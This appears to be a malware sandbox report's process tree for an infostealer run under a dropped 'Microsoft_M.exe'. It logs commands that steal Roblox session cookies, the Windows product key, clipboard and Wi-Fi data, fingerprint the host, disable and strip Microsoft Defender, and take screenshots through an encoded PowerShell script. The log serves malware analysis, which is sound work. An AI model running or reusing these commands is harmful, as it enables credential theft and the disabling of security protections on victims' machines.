C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
5⤵
PID:1176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
5⤵
PID:1300

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
5⤵
PID:5072

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3920

C:\Windows\system32\getmac.exe
getmac
6⤵
PID:2608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50442\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\Zkb1a.zip" *"
5⤵
PID:2344

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:1504

C:\Users\Admin\AppData\Local\Temp\_MEI50442\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI50442\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\Zkb1a.zip" *
6⤵
- Executes dropped EXE
PID:4064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
5⤵
PID:5556

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4208

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
6⤵
PID:5744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
5⤵
PID:6988

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:6072

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
6⤵
PID:5596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:2288

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:1240

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
PID:6340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
5⤵
PID:3064

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
- Suspicious use of SetWindowsHookEx
PID:5008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
6⤵
PID:5356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
5⤵
PID:4656

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:6688

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
6⤵
- Detects videocard installed
PID:2692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
5⤵
PID:5040

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
- Suspicious use of SetWindowsHookEx
PID:6532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
6⤵
PID:2196

C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"
3⤵
- Executes dropped EXE
PID:5068

C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'"
5⤵
PID:2368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
5⤵
PID:6540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:6696

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:2064

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
5⤵
PID:7092

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:5608

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
6⤵
PID:2080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
5⤵
PID:6448

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
6⤵
PID:4488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
5⤵
PID:4860

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
6⤵
- Detects videocard installed
PID:6652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
5⤵
PID:3296

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
6⤵
- Detects videocard installed
PID:5356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‎ .scr'"
5⤵
PID:5408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‎ .scr'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:4612

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:1604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:6064

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
5⤵
PID:4524

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
6⤵
PID:4708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
5⤵
PID:5296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:4728

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:7080

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:6412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:2236

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:6120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
5⤵
PID:3588

C:\Windows\system32\netsh.exe
netsh wlan show profile
6⤵
PID:440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
5⤵
PID:2764

C:\Windows\system32\systeminfo.exe
systeminfo
6⤵
- Gathers system information
PID:5608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
5⤵
PID:6808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2316

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\odqnauyg\odqnauyg.cmdline"
7⤵
PID:5400

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DA4.tmp" "c:\Users\Admin\AppData\Local\Temp\odqnauyg\CSCC664BF494B72436490297C896520D4E.TMP"
8⤵
PID:5740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:1584

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:6556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:6356

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:5348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:5356

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:2344

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:1956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:2220

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:4904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
5⤵
PID:1100

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
6⤵
PID:4984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
5⤵
PID:6488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3216

C:\Windows\system32\getmac.exe
getmac
6⤵
PID:5908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
5⤵
PID:5004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
6⤵
PID:4116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50682\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\yYHHG.zip" *"
5⤵
PID:6644

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
- Suspicious use of SetWindowsHookEx
PID:888

C:\Users\Admin\AppData\Local\Temp\_MEI50682\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI50682\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\yYHHG.zip" *
6⤵
- Executes dropped EXE
PID:7052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
5⤵
PID:4776

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:6652

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
6⤵
PID:2192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
5⤵
PID:468

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
6⤵
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:436

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
PID:4564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
5⤵
PID:6196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
6⤵
PID:2208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
5⤵
PID:6032

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
6⤵
- Detects videocard installed
PID:6352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
5⤵
PID:6012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
